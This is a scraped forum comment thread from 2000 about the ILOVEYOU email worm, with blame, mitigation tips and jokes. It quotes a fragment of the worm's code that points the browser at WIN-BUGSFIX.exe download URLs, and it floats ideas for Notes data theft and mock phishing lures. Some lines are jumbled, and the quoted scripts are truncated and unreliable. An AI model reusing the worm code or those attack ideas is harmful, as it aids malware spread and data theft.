Stupid Users.. Thank God I installed virus checker, Stupid users.. Thank Go...
Well you get the idea. How many fsking times do you have to say "DON"T DOWNLOAD UNKONOWN ATTACHMENTS: before people figure that they are not supposed to do so?
I don't need a million points of light, just two points of multi-mode fiber and a 10 Gig-E router.
n/t
--
Peace,
Lord Omlette
AOL IM: jeanlucpikachu
[o]_O
I believe Word Perfect 2000 will be adopting VBScript as its macro language. So then we can have mail viruses on Linux too.
Not many industry standards come from Redmond. I guess virus-capable mail and ODBC will be the two big ones they'll be remembered for.
I think the most disturbing thing about this is that it can actually be done! I've taken a look through the script and I can't believe that such loopholes are present in the system. Take the registry stuff- an ordinary program with no privileges at all can just fiddle around with vital system variables with devastating results. Then there's the matter of plonking files in system directories without even the vaguest thought about what they are. Right, I think I'll stick my root password on my monitor and set all my system files to a+rw. We can't have secure systems, can we?
This will probably be lost in all the comments but, i have figured out how to stop this virus cold. .vbs or .vbe exstension.
Rename wscript.exe to wscript.bak or delete it completely to keep this virus from spreading.
Then clean the registry and inbox/outbox.
Delete all the files it changed.
Set whatever mail server you are using to reject Any mail attachments with a
ILOVEYOU - NOT ANYMORE!
The virus only hates Windows (and mail servers). It loves my Mac (or at least it does no harm) and I assume it doesn't harm Linux either.
Uh-huh.
:-)
And are you maybe now realizing that it's probably not different -- the person who posted the source code probably did exactly the same thing and had the tag stripped out of his post as well?
--
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
This has happened before (Melissa, etc.) and it will happen again. Anyone still using such obviously problematic software (MS Outlook) deserves what they get.
--
Tired of FB/Google censorship? Visit UNCENSORED!
Oh that's brilliant. Move to an OS which will allow for you to run programs at a different user level.
She should know that you don't run unfamiliar attachments except in a highly secured guest account. And that you don't give your daily account admin permission.
If he won't let her post it on her corporate network, will she at least release it to the rest of the internet? It would solve so many problems....
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Right - luckily enough, I work for the company with the largest Notes userbase anywhere (clue?). I just received this message from one of our other offices:
Within the last one and one half hours, we have recd. multiple requests to print and/or translate the below referenced file into something legible.
Now, first of all, this is wonderful - these people can't actually open the 'LOVE-LETTER-FOR-YOU.TXT.vbs' attachment, because they're all using Notes. On the other hand, many many people wanted to!!
I have now lost my faith in humanity's ability to survive - I hold on because I still think chaos theory is viable.
ert.
[|]
richi.
We had (1) a mesage in e-mail warning of the virus, and (2) a voice-mail warning of the virus (actually two messages), and (3) signs taped at all the entrances to the building
We also HAD e-mail, but with a 32,000 entry company global address book, plus group mail addresses, that was quickly taken down when four people opened the attachment anyway...
Thanks, Bill. Love ya man...
here is my fix for the worm.
it removes the files and registry entries made by the worm. Also removes *.vbs copies from drives and unhides reverts *.mp(2|3)'s.
-If at first you don't succeed, call it version 1.0.
Sendmail, Inc., has posted a blocking configuration feature that enables sendmail mail servers to stop the "ILOVEYOU" virus from entering your computer network at the server level. This feature works on all versions of sendmail 8.9 and above.
You can find the details here.
If administrators add this feature to their sendmail gateways, it will slow the spread of this virus over the Internet.
It's not just the thing that Microsoft always manages it to produce software, that is not made for the daily use: They want to put all their new "innovations" in it, but while they are doing this, they forget important things: They don't fix the tons of bugs and they don't even think about security. But, after all, they don't make _that_ bad products. (oh-oh, I think with this sentence I might get many enemies on /. ;))
:P) had been using Windows, we would not have had such a disaster now. And _that's_ why they should break up Microsoft.
The true problem is, that over 90% of all PCs are running Windows - and most of them also OE and IE. And that's the only reason why this virus could so awfully fast spread over the world. If we would have more competition in the OS and browser markets, this could not have happened: If only every 4th PC or so (although I think this is till far too many
You know. I feel so unloved because I seem not to be on anyone's address book. How sad.
However... I have decided to create a human version of this Trojan, and am currently walking around the office and calling people in my Visor's DB, telling people "ILOVEYOU!" and then urging them to do the same with everyone they know. The entire office is now full of chattering ILOVEYOU!s, and the phone system is about to collapse.
I hope to bring down Bell Atlantic, Sprint, MCI, and AT&T this way.
That'll teach them not to put me on their address book!
The possibility for Notes attacks is pretty much limited to 'internal' users. The default Execution Control List (ECL) allows any member of your /Org to run pretty much any script on your machine.
/O signature into an SMTP message, and mail into my former place of work. Blammo.
/Developers/Org, put all of the developers there, and only grant them access in the Domain ECL, and then make sure that *everything* is properly signed. This would limit normal users to some extent, but normal users really don't want this sort of macro functionality anyway.
The one big hole in this scheme is that it allows former users to continue to run scripts after left the company. (Having old IDs 'in the wild' is pretty much inevitable for Notes shops.)
So I could write a Notes mailbomb, encapsulate it and the proper
The best solution (I can think of) is to create an OU such as
Making things worse is the fact that there's lots of sensitive information in Notes systems, so tactics such as these would make wonderful industrial espioniage devices. (One well crafted PostOpen event sent to the Director of HR could lead to the entire Salary database ending up in my Hotmail inbox.)
Right now Exchange/Outlook shops are pretty much limited to mail/calendar/discussion applications. But, Microsoft is building a more compelling groupware infrastructure on top of Exchange and Office. If anything, ILOVEYOU proves how easy it would be to conduct espionage activities against such shops -- just mail in a HTML message with a OLE Automation script embedded.
--
Business. Numbers. Money. People. Computer World.
Does anybody know where a good-hearted Linux user can get a copy of WIN-BUGSFIX.EXE?
I'm at home right now because my IT department got so parnoid they basicially said don't use any program that uses the network. For my company, it will be a mess to clean up, and seeing that they think an AS/400 system needs to be isolated until this is over, it will be a while.
I checked my Outlook before leaving and only a few copies had made their way to me. Problem there though is any copy will use the Global Address book IT set up, and spam many thousands of accounts across several sites.
For any of you protecting your Exchange 5.5 server with Norton Antivirus (Symantec), there are signatures here. They aren't tested or approved, AFAIK, but they're working at my location. It won't repair the file but will quarantine bad attachments. You might want to keep the server off your network while you do this. Stop your store while you're copying the signature file to your server, then pull your ethernet cable when you want to start it again to run NAV.
n tivirus_definitions/norton_antivirus/spe cdef
That url is ftp://ftp.symantec.com/public/english_us_canada/a
Of course, this assumes that he's in a jurisdiction which doesn't have those pesky prohibitions against cruel and unusual punishment.
/.
/. If the government wants us to respect the law, it should set a better example.
Doesn't affect linux? Right. /. seems to be the best available technical source for MS Windows. A search for ILOVEYOU on microsoft.com timed out with 0 results. You would think that by now they would have some clue as to what is going on.
Does affect MS Windows? Right.
What it is, and how to clean up the damage IS news.
As usual,
Theres no better mail client for windows than outlook express? Come on. The only mail client I will ever use is Eudora.
Only the State obtains its revenue by coercion. - Murray Rothbard
At least it's open source.
The first, last, and only tech news site on the net
In the following code you can see that the trojan is setting IE's default page to one of four URL's that are a link to a file called WIN-BUGSFIX.EXE. I haven't been able to connect to any of the URL's at the user's home dir level yet because my request keeps timing out. Does anyone know what this file does? Is it just a way for the trojan to keep track of computers it has already run from?
j kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe" d jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" p Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe" B mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
I have a website. It's about Macs.
Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .
Lookout is actually the name that a lot of people use to refer to it internally at Microsoft. I think I even heard of a story where BillG referred to it as Lookout once... don't remember.
I have a website. It's about Macs.
Written by my colleague, use at your own risk. Subsequent version will delete the viral *.vbs files and un-hide the hidden MP3 files. This could be improved: but I figured, release early, release often!
r rentVersion\Run\MSKernel32" r rentVersion\RunServices\Win32DLL"
t \Internet Explorer\Download Directory")
r rentVersion\Run\WIN-BUGSFIX"
' Written by nowickis@hotmail.com
' No warranties: This may ruin your entire life and cause massive damage, use at your own risk!
'
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set szDirWin = fso.GetSpecialFolder(0)
Set szDirSys = fso.GetSpecialFolder(1)
Set szDirTemp = fso.GetSpecialFolder(2)
set wscr=CreateObject("WScript.Shell")
'The virus creates several copies of itself. Delete them . . .
fso.DeleteFile szDirSys & "\MSKernel32.vbs"
fso.DeleteFile szDirWin & "\Win32DLL.vbs"
fso.DeleteFile szDirSys & "\LOVE-LETTER-FOR-YOU.TXT.vbs"
fso.DeleteFile szDirSys & "\LOVE-LETTER-FOR-YOU.HTM"
'It then sets these instances to run at start-up. Stop that from happening . . .
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
szDownloadFolder = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsof
if (szDownloadFolder = "") then
szDownloadFolder = "c:\"
end if
'The virus sets your IE homepage to point to an executable called WIN-BUGSFIX.exe and then sets that
'file to load at start up. I don't know what that file does, but it's probably not nice. Let's delete that
'one, too.
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
'Reset the IE home page . . .
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.microsoft.com/ie"
'That should do it. Any problems, check the web site of your anti-virus provider for additional help . . .
Now, my software happens to snag attachments and replace them with links, so this one didn't go anywhere, but someone did obediently go and acquire the pointed-to file before I removed read access. Fortunately, he was using Netscape, so nothing happened.
So here's my question: since mailing list users tend to blindly trust each other, and sometimes they do want to legitimately exchange executables, is there something I can run on the li'l ol' penguin-powered server that will detect (some, most, any) Windows viruses so I can protect these people from themselves?
(Yeah, some of them are morons. But, dangitall, they're my morons.)
Slashdot's token middle-aged housewife
So far only one news orginization has gotten the story right. All the newscasts I've heard are leaading with titles like "E-mail Virus Criples Internet Users", none of them even mention that's its an MS-Outlook problem. This really irks me because they're missing the whole point that this is not an "Internet e-mail" virus it is a "Microsoft Outlook" virus. I felt vindicated 5 minutes ago when I heard on NPR's "All Things Considered" start off with the headline "Virus Inside Microsoft E-mail....". Congratulations NPR/All Things Considered for getting it right!
From: My Friend
Subject: Fix for "ILOVEYOU" virus
The IT department just received this patch from Microsoft which prevents the ILOVEYOU virus from infecting your computer. Double-click on the "ILOVEYOU.FIX" file to install the fix on your computer.
Attachment: ILOVEYOU.FIX.vbs
-----
Hey, it could happen! (I'm suprised it didn't)
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?
What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'
And here I thought that virus stories were "too good" for Slashdot.
A couple weeks ago, I submitted a story that was on CNN about a virus that will actually use your computers modem (if it has one) to dial 911.
The story was declined.
This seems a bit more important (at least, to me) than an 'annoying' 'virus'. This one has the potential to get you in to a bit of trouble. Not to mention you really don't want emergency crews knocking at your door.
I'm sorry. What I meant to say was 'please excuse me.'
what came out of my mouth was 'Move or I'll kill you!'
A new variant is already making the rounds. Does anyone know the best way to configure sendmail to reject ALL Visual Basic attachments?
The new variant uses a subject of "fwd: Joke"
. Rename the file to 'I HATE YOU'
. Change the wording in the body mesg: I HATE YOU!. If you lick on this icon, you will die!
. Make myself a nice lemondade and watch CNN until the report of the "newer and more powerful virus appears" comes up
. Wait until either
1: FBI agents knock on my doors OR
2: Die of old age.
I received the virus this morning, in my hotmail account. Hotmail has a feature to scan attachments automatically, but it didn't catch the virus (using a product from McAfee). However, the message was forwarded to me by a person, who knows diddly-squat about VBS and so, being the suspicious guy that I am, I saved the attachment to disk and opened it with EMACS instead. The scary part is that there are several users who trust their virus scanners to say that an attachment is safe to look at. I guess Microsoft had better update their virus scanner on Hotmail as soon as possible.
Without question here's the best way to protect against these kind of macro viiri if you're an Outlook user, it works for us:
& pid=47&aid=56
How Active is Active Content in Email?
http://ntbugtraq.ntadvice.com/default.asp?sid=1
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
http://www.enme.ucalgary.ca/~nascheme/qmail-filter .py
In a week all the commotion will have died down, most copies of the virus / trojan horse / whatever will have been deleted and only a few will still be doing the rounds. But who, if anyone, should shoulder the blame for what has happened?
Obviously the prime contender is whoever wrote the script in the first place. It is fairly obvious that the intent was malicious, and after Melissa it is widely known what damage these sorts of things can do. But is it fair to pin all the blame here, after all after Melissa we all learnt our lesson, didn't we?
It would appear not, and we risk shooting the messenger. Is the real culprit Microsoft who has left the system so open to abuse? After all they wrote all the code with all the interoperability, and hence all the scope for the security breaches we are seeing. But why wire all the programs together, and make all of them work as one...
...unless it is something that the users have asked for? Could the desk jockies be the problem, wanting all this ease of use and abstraction from the nitty-gritty, so that writing an email is just like a letter is just like all the rest? After all work is dull enougth, let the Microserfs deal with all the boring computer jargon.
It is clear what will happen, and has already started to happen. The powers that be will press release that the villain is the author of the script, that (s)he has exploited security holes to disrupt society, and will be punished.
It will not occur to the media-at-large that perhaps the company that hasn't fixed the problems after Melissa could be to blame. That Microsoft could have been just a little bit negligent and perhaps should have to make an apology, or pay up some expenses.
Finally maybe the general users should get a stern word or two. If they want ease of use and security, they will have to kick up a fuss when they don't get it. How many people have complained to Microsoft as yet? Thought so.
In the end the blame will fall on one person, whereas it should fall on quite a few. Hopefully this time around some more heads wil roll, and people will start to realise that software is just like any other commodity. If it doesn't work you get your money back, or you get compensation.
Fool me once, shame on you.
Fool me twice, shame on me.
Many PCS cell phones now have email to text message gateways, and I'm sure that some PCS phones' email addresses are in some peoples' lists...
Are we going to be hearing about PCS systems crashing under heavy load of I-LOVE-YOU text messages?
Tarsnap: Online backups for the truly paranoid
By installing Windows and clicking the usual "I agree not to ever sue MS ever" I'd guess most victims aren't able to sue MS over the lack of security in Outlook.
How about owners of unix mailservers? Do we have a right, having not aggreed to the licence, to seek compensation for having our systems flooded due to Windows poor security?
There was a semi-clever comment posted along with this story (as there are with many /. posts) regarding Microsoft and its products. As usual, it comes from an uninformed perspective.
The comment suggested that Windows has weak security and as a result, has too much virus activity, whereas an OS like Linux doesn't.
DUH!
How many of you remember any virii running under H-DOS or CP/M (how many of you even know what I'm talking about)? The reason Windows has virus issues is because it totally owns the OS market, as the DOJ has not-so-subtly revealed.
Linux doesn't have virus problems because nobody wants to waste their time on a virus that will affect less than 1% of corporate desktops.
Besides, nobody would release a Linux virus until it had been open-sourced, peer-checked, and incorporated into the next Linux distribution.
Destroys all your MP3s? I heard about this thing a while ago, I think it was called Project Zapster. It was done by some hacker group called the RIAA. Sneeky SOBs.
This one has been predicted ever since Melissa was released. Now we have one that does something dangerous, but its still nowhere bad as it could be. Next time it won't use an easily parsed subject line. Next time it won't go around erasing random files, it will just wait until a certain date and just nuke the entire computer.
Of course, I don't use outlook. Maybe during the long recovery process, other people will start to realize the disadvantages of it as well.
-Restil
Play with my webcams and lights here
How?!
The user saved the attachment on the unix server, ftp'd it to his windows box and ran it!
...are you stupid enough to run an attachment? No? OK then, is there anyone else at work stupid enough to run an attachment, and is your hard drive shared?
You are not me, therefore you are not important
I've put a script up here that removes the virus from unix mailspools.
I'm sure the author of this program is going to be extremely upset when he finds out about all the people illegally distributing his copyrighted work!
Maybe he can hire NetPD to find out who the people distributing his vb script are.
I hope this gets stopped before it sets more of a precedent for people to just ignore copyright laws.
Couldn't resist this: Here's Scott Culp, programing manager for Microsquish's security response center (Love that last line) :
``Viruses are really an industry-wide issue,'' said Scott Culp, program manager for Microsoft's security response center. ''They can be written
for any platform. They can be written to use a variety of e-mail clients.
``In this case the virus author chose to target Outlook probably because it gave him better reach,'' he said. ``There isn't a security vulnerability in Outlook involved in this at all,'' Culp said.
But what damage could a .sh do in, say, Pine?
Well, not a lot; the script would be shown; you have the option of viewing it and then, if you like, save and run....
But the fact is, any high-exposure software (mail-client, Napster, whatever) is vulnerable, not just because it runs under a single-user OS, but because it's a prime target; who'd bother exploiting a weakness in kmail / elm / pine / etc?
This isn't of course forgetting (OSS)sendmail's many security holes... it also is high-exposure, and often runs as root(0)... Why bother with file permissions when you've got an exploit letting you become God?
Okay, it's easy when a Windows user is root by default.
What I'm saying is:
It's not just M$ / closed software which is vulnerable to this kind of exploit; anything in wide use is the main target.
This means that OSS is far from invincible to this kind of attack - especially as it gets more popular - sendmail is an old and tried example of this. Worth bearing in mind before we slam Closed / M$ software for being so buggy
This doesn't excuse M$ for allowing Outlook to run these scripts any more than it excuses sendmail authors from their responsibility.
Yrs, Steve.
Author, Shell Scripting : Expert Re
As soon as somebody says "email virus" all the slashdotters go up in flames about how mas M$ is and how outlook and VB are the root of all evil (which may be true of vb but i digress).
If you would take more than 2 seconds to look at the ACTUAL FACTS (*mass intake of breath*) you'd see that this is a trojan, that is spread by people running attachments... WOW! OH MY GOD! ATTACHMENTS CAN COME TO OTHER EMAIL CLIENTS!!!! Who'da thunk it? Damned microsoft, it must be their fault... How could anything bad not be microsoft's fault???
Clowns.
Now watch me get moderated into oblivion for not bagging MS.
-Gfunk
Send lawyers, guns, and money!
Somebody gonna give us an absolute on this?
Don't do email in winderz myself, so I don't know
- only do M$Word - also Melissable! M$'s file formats aren't open... If I've received an email from someone, I want it to be readable whatever OS / mail client I'm in - so Winderz can't see Linux partitions, so I don't do email in winders.
Author, Shell Scripting : Expert Re
What about the journalists that report it?? I've sent the following off to the BBC, in hopes that MicroSoft will shoulder its share of the blame. I encourage the rest of you to send similar messages to the BBC and to other news organizations whose coverage is similarly incomplete.
-------------
From: L. Adrian Griffis <adrian@idir.net>
To: newsonline@bbc.co.uk
Subject: Missing the Point Regarding the "ILOVEYOU" Virus.
While I'm delighted to the some substantial details in your coverage of
the tour of the "ILOVEYOU" virus, I'm disappointed that you haven't
pointed the finger at the one organization that should carry most of the
blame. That organization is MicroSoft.
Don't get me wrong, I'm appalled at the kind of attitude that must be
behind a decision to release this virus. But MicroSoft's 20 years of
reckless and perverse disregard for the safety of their customers' data
is the central theme in all of these virus incidents. In the Unix/Linux
world, when a vulnerability is discovered in an email client, it is
acknowledge as a bug and corrected. It would never occur to us to
tollerate a product that continues, release after release, with the same
flawed design from a vendor that won't even acknowledge the flaws. It
astonishes me that the MicroSoft Windows community never even cries foul
when they find that MicroSoft has, once again, held their pants down
during yet another attack. It astonishes me further that this same
community thinks it quite natural to spend money on a third party
product (a virus scanner) whose purpose is to shield this system, that
the first vendor won't lift a finger to fix, from the malicious data
that exploits the first vendor's neglect.
Why haven't I seen a single negative comment about MicroSofts role in
this crisis?
Thanks
Adrian
All I did to stop the effects of this is...
1) Open Folder Options
2) Go to File Extensions
3) Disassociate vbs files with all apps--in other words, delete the file extension
------------
Tonight on Fox: Deadliest Executions Part XVII
Or type his variables~
---
McAfee did have an updated dat file for the virus around 10am this morning. I'm sure the hotmail people have updated their scanning service accordingly.
Due to the overwhelming ease with which the source code for this trojan is available, get ready for the script kiddie Exchange DoS. Any one of a million variants will be showing up on your mail server soon. --mr
Good Mornings!
I'm surprised that no one has mentioned Samba yet......we (UNIX group) got hit through a (Samba)mapped drive to a UNIX server. Luckily we caught it almost immediately. Did a shutdown and then came up in single user mode with the ethernet cable yanked (can you say paranoia?) Disabled the samba server and removed it from startup. Did a find to identify overwritten files (piped to a text file to document for users) and then deleted. I can also see this trojan getting unintentionally propagated through UNIX servers by people with windows "hide file extensions" turned on while FTPing through a GUI client. Next (windows) user comes along and downloads it (GUI windows client) and BLAM!
What if someone rewrites this virus so that instead of sending itself with the same name to everyone in the address book, it would make sure every email sent has a different title and different name of the attachment? The virus could perhaps open some Word documents on the infected hard drive and randomly select some sentences. This way it could even localize itself, so that it would use a swedish subject in Sweden, a thai subject in Thailand, and a portugese subject in Brazil.
The really bad thing with such a virus would be that prevention would be much harder. All you can say is: Don't open email attachments if they are sent to you from someone you know!
In a way I really hope someone writes such a virus, since it would make it so obvious what crap products Microsoft makes.
Mats
Thus, we must put XML in the kernel. That would solve the problem. And tech-savvy CTO's know it. If Linux is to compete with other operating systems, it must put XML in the kernel. Security is a distraction. It's all XML these days.
I am not a lawyer.
I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.
I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.
www.eFax.com are spammers
Why stop there? Why just make it seem as if MP3s were being deleted, instead of actually zapping them? If I really wanted to do some serious damage, I'd have written it to take out executables -- or worse, harder-to-replace documents such as word processor files, spreadsheets, Powerpoint presentations...hey, even settings for "The Sims".
It seems that this virus was meant to do just enough damage to make a point about security, rather than be seriously crippling. Either that, or the writer fears that if the damage was worse, he'd be in even deeper crap with the authorities.
Opinions?
If you want to get people to change their behavior you have to do more than tell them to stop the "bad" behavior. You have to give them a "good" alternative.
Instead of saying "I told you Microsoft was bad." we should be saying "Switch to Linux so you won't be vulnerable to this class of attack."
(Sure there are attacks that are possible on Linux. But they're fewer, and a damned sight harder to pull off. Microsoftware, on the other hand, has gaping holes all over the place, and no way for anybody who doesn't work for Bill's company, or hand-in-glove with it, to fix them.)
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Oh well. At least it gives me one more thing to laugh at - two, really: the fuckwits who get hit by it, and the even greater fuckwits who think it's some kind of global emergency. I mean, really, most wars don't get this much attention. And it's not like people don't have a choice about getting the virus...
A Flu epidemic? Sure, that's news. ILOVEYOU? Gimme a fuckin break.
I received this from a friend this morning:
I'm sure by now you've all heard of the 'ILOVEYOU' e-mail virus. Well, on
hearing about this in the news first thing this morning, an unnamed manager
physically disconnected (without the sysadmin knowing) the mail server to
'protect' our LAN - so the virus had a fantastic, if unintended DoS effect
on our organisation at least. As an added bonus, the mail server which was
disconnected was also the authentication server for our network, so logins
and various network apps failed, and made for one happy sysadmin.
Let me share with you a couple of e-mails everyone received a little later
this morning, once the mail servers were brought back:
---------------------------
From: an unknown manager
Subject: ILOVEYOU virus
Attention all staff,
If you have received any e-mails with a subject line containing "ILOVEYOU",
DO NOT OPEN.
Delete this e-mail immediately and contact the IT Help desk on xxxx.
Thank you
The unknown manager
----------------------------
This came half an hour later:
----------------------------
From: the unknown manager
Subject: Virus alert correction
All Staff,
It has come to my attention that some staff may not have opened my last
e-mail because of the subject line, so I'm repeating it here:
If you have received any e-mails with a subject line containing "ILOVEYOU",
DO NOT OPEN.
Delete this e-mail immediately and contact the IT Help desk on xxxxx.
Thank you
The unknown manager
---------------------------------
After that correction to the original, another problem remained - everyone
took 'this email' in the correct grammatical sense and immediately deleted
the warning e-mail and called the IT helpdesk. Best laugh I've had in a
long time.....
> the presence of the code on Slashdot.org
/. post with IE5?
Is there any truth to the rumor that you can catch the virus by reading the
--
Sheesh, evil *and* a jerk. -- Jade
The creator was, as the old cliche states, either very smart or very stupid.
If the 'very stupid' scenerio is the case then I'd be willing to bet that rather than "laughing themselves off thier chairs" they are more likely shitting themselves. They know as well as you and I that they will be caught. They included way too much information.
for example "rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines"
and the references to
www.skyinet.net
Sky Internet,Inc.
L/G Victoria I Bldg. 1670 Quezon Ave.
Quezon, Ph 1103
8000
+63 2 411-2005
Fax- +63 2 411-2003
and the 4 users of Sky Internet, Inc. (chu, angelcat, young1s, and koichi.
I'm sure someone will be able to make the connection between all of this.
OR this guy was smart enough to select sky internet and grammersoft at random and has no connection whatsoever with these companies.
either way I hope hes caught, it'll be interesting to see what his punishment is
-Znix
Think of what sense this makes. So, every time a program changes anything on a system, it needs the user's confirmation? Just THINK about this for ten seconds. Think of programs you use on a daily basis. Think of how many things they change on your hard drive. Do you want a prompt for every single one of those!?
Oh, yeah, also: Outlook ALREADY WARNS YOU if you try to open an executable attachment. But the people spreading this virus ignore the warnings and run it anyway. Stupid people are the problem, here.
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
Pretty scary... I heard on CNNHN that some european photo archives had lost alot of data due to the trojan overwriting jpg files... I wonder how many people had their .mp3 collections toasted :).
...unfortunately no one can be told what The Mat^H^H^HGoatse is...they must experience it for themselves...
Alright, i wrote a small vbs file and emailed it to myself, to see if any of the FUD here is true.
First of all, IT DOES *NOT* EXECUTE AUTOMATICALLY IN THE PREVIEW PANE!!! I don't know what you people are talking about! I have to click on the attachment-button, then click on "Excel.VBS" in the drop-down menu.
It then pops up a dialog that says:
"Open Attachment Warning
Opening:
EXCEL.VBS
Some files can contain viruses or otherwise be harmful to your computer. It is important to be certain that this file is from a trustworthy source.
What would you like to do with this file?
[ ] Open it
[x] Save it to disk
[x] Always ask before opening this type of file"
You have to choose "Open it" then click "OK", then it runs.
That's a pretty stern warning, but people ignore it because it's from someone they know. You would think that people would learn after the melissa worm. Don't run ANY files you recieve in email without confirmation first.
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
1) "This script is attempting to send mail, would you like to allow it?"
2) "This script is attempting to modify the hard disk, would you like to allow it?"
3) "This script is attempting to modify your startup programs, would you like to allow it?"
Pretty easy, ne? Maybe I should email them :P
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
Ok, I must have misread you.
Actually, i think i agree with you. Specifically to these problems (script or macro based email worms), there are three things I see where there should be at least a user confirmation, if not a complete restriction of the script:
1) Attempting to send email (maybe it can write it, but the user has to send it)
2) Attempting to modify the disk
3) Attempting to modify startup programs or other programs' registry settings (already somewhat protected in NT, but not enough)
-------------
The following sentence is true.
The following sentence is true. The preceding sentence was false.
Microsoft Press announced today the release of a new software package, titled "Microsoft Outlook". This tool kit, reviewed by many and considered to be yet another attempt by Microsoft to branch into alternate software development paths previously unexplored, has the creators of the popular "Virus Creation Lab" worried. "This could put me out of a job," claimed one respondent, who preferred to remain anonymous. Microsoft seems confident that their software will be recognized for what it is, an attempt to provide users of Windows 98, Windows NT, and Windows 2000 with the capacity to create and test viruses, in the comfort of their own home. The software includes a scripting language, several virus templates, and rigorous testing utilities designed to maximize the effect of any virus scripted by the user. It also included an integrated e-mail client. Microsoft will begin releasing a free version of the software next week, known as Outlook Express. This version includes a few sample templates, a smaller version of the tool kit, the scripting language, and the integrated e-mail client. The user will have the option to upgrade to the full version of Outlook for a small charge.
Alari Hyena
... I wonder if The Onion is hiring...
I use Windows... like a two dollar wh.. why don't I just go ahead and not finish that sentence.
To everyone who says that the solution is to tell people not to open unknown attachments, maybe there is more to the problem/solution than that... I found the name of the vbs file to be probably the best-engineered part of the virus... Assume that one of your relatives or a trusted friend gets infected, and you happen to receive a note called I-LOVE-YOU. Your first impulse is to open it and see what the 'trusted' party sent to you... Everyone who uses outlook is likely to have some close friends in their address book, so this scenario is not unlikely to happen. I feel like the blanket solution of making fun of people who open email attachments won't help, for the same reason as telling children not to talk to strangers is ineffective. The child's image of a stranger is not at all what it should be for the child's safety. Most users are not trained to look at the extension of a file (some even have those extensions turned off), but none will hesitate to try to judge the contents by the main name or icon. Perhaps a better fix to this kind of problem would be better grouping of icons for security. Anything that stands a chance of getting run on a system should perhaps be assigned a more dangerous-looking icon. Also, perhaps the use of file permissions, and setting all incoming file attachments as read-only, non-executable (like you can do in *nix) would help.
There's a difference: ignorance can usually be cured. If not, it's also idiocy.
Regards to your mum from a complete stranger. <g>
Got a beef? Plug a name into the Bizarre Rumour Generator!
I just went over to www.microsoft.com - not a word about this on the home page. So I did a search on "iloveyou" - it returned 0 hits. So I went into the MS Office area of the site, just to be sure, and got exactly the same result. I just love to see MS facing up to its responsibilities. Still, at least I was able to find out about their commitment to innovation.
Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
Colin,
:-(
Writing things like this in Visual Basic is easy.
But one of these days, some really expert programmer with a nasty intent is going to write a virus that is extremely insidious and start literally shutting down hardware that works on the various layers of the OSI networking model. Given that routers ARE computers of sorts, let's see how long before someone could bring down much of the Internet by bringing down a major backbone provider such as UUNet.
Raymond in Mountain View, CA
I can foresee it:
The warnings about this virus will still be spread on the internet, even when the last M$-Machine has been shutdown and no platform is left where the virus actually can be executed.
So effectively we now have two viruses to deal with:
1. The actual virus itself
2. The meta-virus (aka warning)
Possible Solution (Metallica Method):
Forbid e-mail
--- If OS were buildings, then the first woodpecker to come around would erase 95 % of civilization.
ILOVEYOU spread across the whole world in just a few hours. What if something like this killed the host an hour or two after infection? By the time it destructed, it would already have several generations of offspring.
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
What this virus made clear to me is that the news media seems to be afraid of blaming Microsoft for having insecure products, even though they bash them daily in their coverage of the antitrust trial.
Even the Slashdot lead-in doesn't mention Windows, Outlook (aka Outhouse), or VB specifically!!!!!!! Looking at all the other mainstream and niche press coverage of the virus, Microsoft is rarely mentioned before the fourth or fifth paragraph. On Nightline last night, Ted Koppel and guests went off for half an hour on the evilness of whatever fifteen year old unleashed this thing, and they left Microsoft alone. (I think so anyway, I couldn't actually stomach watching it for more than ten seconds at a time.)
My question is, what kind of world do we want?
